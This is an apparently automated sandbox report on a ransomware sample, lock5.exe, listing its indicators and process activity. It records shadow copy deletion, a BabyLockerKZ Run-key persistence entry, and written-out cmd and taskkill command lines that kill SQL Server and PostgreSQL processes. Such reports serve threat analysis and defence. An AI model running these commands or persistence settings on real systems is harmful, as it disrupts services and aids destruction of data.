Malware Analysis Report

2024-12-07 09:58

Sample ID 241114-grlg7synck
Target lock5.exe
SHA256 10916ae59a8f99306f1af033bb5e97df353e36be9eeaf41264a9146e56f9197e
Tags
defense_evasion discovery evasion execution impact persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

10916ae59a8f99306f1af033bb5e97df353e36be9eeaf41264a9146e56f9197e

Threat Level: Known bad

The file lock5.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware

Suspicious use of NtCreateUserProcessOtherParentProcess

Deletes shadow copies

Renames multiple (192) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (170) files with added filename extension

Deletes system backups

Adds Run key to start application

Enumerates connected drives

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of WriteProcessMemory

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 06:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 06:02

Reported

2024-11-14 06:04

Platform

win7-20241023-en

Max time kernel

149s

Max time network

122s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2244 created 1200 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (192) files with added filename extension

ransomware

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cipher.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cipher.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3024 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3024 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3024 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2980 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2848 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2848 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2848 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2744 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2744 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2472 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2472 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2472 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 572 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1364 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1364 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1364 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2244 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 568 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 568 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\lock5.exe

"C:\Users\Admin\AppData\Local\Temp\lock5.exe"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlbrowser.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sql writer.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlserv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msmdsrv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im MsDtsSrvr.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlceip.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdlauncher.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im Ssms.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\taskkill.exe

taskkill -f -im SQLAGENT.EXE

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdhost.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im ReportingServicesService.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msftesql.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\taskkill.exe

